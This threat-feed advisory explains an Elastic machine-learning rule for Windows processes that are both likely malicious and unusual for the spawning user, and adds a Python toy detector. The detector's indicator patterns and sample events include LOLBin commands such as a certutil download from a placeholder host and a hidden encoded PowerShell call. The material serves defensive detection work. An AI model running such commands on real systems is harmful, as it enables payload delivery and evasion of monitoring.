Threat Feed
low advisory

Unusual Process Spawned by a User Detected via Machine Learning

A machine learning job has detected a suspicious Windows process: the ProblemChild supervised ML model predicted it to be malicious, and an unsupervised ML model judged it unusual for the user that spawned it. The combination indicates potential defense evasion activity involving LOLbins.

This rule leverages machine learning to identify unusual process execution patterns on Windows systems. It uses the “problem_child_rare_process_by_user_ea” machine learning job to detect processes that are both predicted to be malicious by a supervised model (ProblemChild) and considered unusual based on the user context by an unsupervised model. This approach aims to identify potentially malicious activity, including the use of LOLbins (Living Off The Land binaries), that might evade traditional signature-based detections. The rule is designed to work with data collected by Elastic Defend or Winlogbeat and requires the Living off the Land (LotL) Attack Detection integration to be installed and configured. The integration focuses on identifying defense evasion tactics employed by adversaries.

Attack Chain

  1. Initial Access: An attacker gains initial access to a Windows system through various means (e.g., phishing, exploiting a vulnerability).
  2. Privilege Escalation (Optional): The attacker may attempt to escalate privileges to gain higher access levels on the system.
  3. Defense Evasion: The attacker leverages LOLbins (e.g., certutil.exe, powershell.exe) to execute malicious commands or download payloads, blending in with legitimate system activity.
  4. Process Execution: The attacker spawns a process using a LOLbin within an unusual user context, making it harder to detect with conventional rules.
  5. Command and Control (Optional): The spawned process establishes a connection to a command-and-control server for further instructions or data exfiltration.
  6. Lateral Movement (Optional): The attacker moves laterally to other systems on the network, using the compromised system as a pivot point.
  7. Data Exfiltration (Optional): The attacker exfiltrates sensitive data from the compromised system or network.
  8. Persistence (Optional): The attacker establishes persistence to maintain access to the system even after a reboot.

Impact

A successful attack using LOLbins can lead to a variety of negative outcomes, including data theft, system compromise, and disruption of services. While this specific rule has a low severity and a risk score of 21, the underlying techniques can be part of a larger, more damaging attack. The focus on process execution that is unusual for a given user is valuable for catching advanced persistent threats (APTs) or insider threats that have already bypassed initial security layers.

Recommendation

  • Ensure the Living off the Land (LotL) Attack Detection integration is installed and configured correctly, including the “problem_child_rare_process_by_user_ea” machine learning job as outlined in the setup instructions.
  • Enable Windows process events collection using Elastic Defend or Winlogbeat, as specified in the setup section.
  • Deploy the Sigma rules listed under Detection coverage to catch LOLBin execution with suspicious command-line arguments; they complement the ML job, which supplies the user-context rarity signal that the Sigma rules do not model.
  • Review the triage and analysis steps in the rule’s note section to effectively investigate alerts and minimize false positives.

Detection coverage (2 rules)

Detect LOLBin Execution with Unusual CommandLine Arguments

medium

Detects execution of known LOLBins (Living Off The Land Binaries) with command-line arguments indicative of malicious activity, possibly used for defense evasion.

Format: Sigma
Tactics: defense_evasion
Techniques: T1036, T1218
Sources: process_creation, windows

Detect Suspicious Cmd Execution with Hidden Window

low

Detects cmd.exe executed with the /c parameter together with start /min, which can indicate an attempt to hide the window of the spawned command.

Format: Sigma
Tactics: defense_evasion, execution
Techniques: T1059.003
Sources: process_creation, windows
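The two Sigma rules above, together with the ML rule's requirement that both a supervised verdict and an unsupervised "rare for this user" signal fire before alerting, as an added Python example. This is not Elastic's ProblemChild code and not the platform's Sigma rules: indicator matching on LOLBin command lines stands in for the supervised verdict, and a per-user process-frequency baseline stands in for the unsupervised rarity score. The event field names, the indicator patterns, the 2% rarity threshold and all sample events are assumptions constructed for this example.

```python
"""Toy LOLBin + user-rarity detector (added example, not Elastic's code)."""
import re
from collections import Counter, defaultdict

# Indicator patterns assumed for this example: a LOLBin image name plus a
# command-line fragment that is rarely legitimate for an interactive user.
# "cmd_hidden_window" follows the second Sigma rule's description (/c + start /min).
LOLBIN_INDICATORS = {
    "certutil_download": (r"certutil\.exe", r"-urlcache|-decode|-encode"),
    "powershell_encoded": (r"powershell\.exe",
                           r"-enc\b|-encodedcommand\b|downloadstring|\biex\b"),
    "cmd_hidden_window": (r"cmd\.exe", r"/c\s.*start\s+/min"),
}

# Constructed baseline of process_creation events (fields user, image,
# command_line are an assumed schema, not a real one). Note alice has 100
# events, only one of which is powershell.exe.
BASELINE_EVENTS = (
    [{"user": "svc_backup", "image": r"C:\Windows\System32\cmd.exe",
      "command_line": r'cmd.exe /c "C:\backup\run.bat"'}] * 50
    + [{"user": "alice", "image": r"C:\Windows\explorer.exe",
        "command_line": "explorer.exe"}] * 60
    + [{"user": "alice", "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
        "command_line": "outlook.exe"}] * 39
    + [{"user": "alice", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe -noprofile -file report.ps1"}]
)

# Constructed new events to score. "AAAA" is a placeholder, not a real payload.
NEW_EVENTS = [
    {"user": "alice", "image": r"C:\Windows\System32\certutil.exe",
     "command_line": "certutil.exe -urlcache -split -f http://example.invalid/p.txt p.txt"},
    {"user": "svc_backup", "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /c start /min C:\backup\run.bat"},
    {"user": "alice", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc AAAA"},
    {"user": "bob", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -noprofile -file C:\scripts\clean.ps1"},
]


def match_indicators(event):
    """Return the names of LOLBin indicators matched by one event (Sigma-style check)."""
    image = event["image"].lower()
    cmd = event["command_line"].lower()
    return [name for name, (bin_re, arg_re) in LOLBIN_INDICATORS.items()
            if re.search(bin_re, image) and re.search(arg_re, cmd)]


def build_baseline(events):
    """Count how often each user has spawned each image: the 'normal' profile."""
    counts = defaultdict(Counter)
    for e in events:
        counts[e["user"]][e["image"].lower()] += 1
    return counts


def is_rare_for_user(event, baseline, threshold=0.02):
    """True if the image is below `threshold` of the user's historical spawns,
    or the user has never been seen. Stand-in for the unsupervised rarity score."""
    user_counts = baseline.get(event["user"])
    if not user_counts:
        return True
    total = sum(user_counts.values())
    return user_counts[event["image"].lower()] / total < threshold


def detect(events, baseline):
    """Alert only when both signals fire, mirroring the advisory's rule logic:
    an indicator hit (supervised stand-in) AND rarity for the user (unsupervised)."""
    alerts = []
    for e in events:
        hits = match_indicators(e)
        if hits and is_rare_for_user(e, baseline):
            alerts.append({"user": e["user"], "image": e["image"], "indicators": hits})
    return alerts


if __name__ == "__main__":
    for alert in detect(NEW_EVENTS, build_baseline(BASELINE_EVENTS)):
        print(alert)
```

Running the block alerts on alice's certutil download and encoded PowerShell, but not on svc_backup's cmd.exe /c start /min, because cmd.exe is that account's normal process: the indicator fires alone and the user-rarity gate suppresses it. Bob's unseen PowerShell is rare but matches no indicator, so it is also suppressed. That gating is why the ML rule pairs the two models rather than alerting on either signal by itself.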
